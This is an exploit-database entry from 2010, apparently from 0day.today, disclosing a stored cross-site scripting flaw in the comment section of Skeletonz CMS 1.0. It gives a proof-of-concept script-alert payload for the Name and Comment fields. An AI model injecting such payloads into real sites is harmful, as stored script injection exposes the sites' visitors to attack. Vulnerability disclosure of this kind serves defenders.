id: 14992
date: 11/29/2010
title: Skeletonz CMS Permanent XSS Vulnerability
author: Jbyte
cves: 

=========================================
Skeletonz CMS Permanent XSS Vulnerability
=========================================

# Exploit Title: Xss on skeletonz-simple dynamic cms in the section comments
# Google Dork:
# Date: 27/11/10
# Author: Jordan Diaz aka Jbyte
# Software Link: http://orangoo.com/skeletonz/
# Version: 1.0
# Tested on: Windows xp
# CVE :
The follow xss is located in the section of comments of the CMS skeletonz
Xss Exploit
field Name: <script>alert('xss');</script>field Comment: <script>alert('xss');</script>



#  0day.today [2023-03-27]  #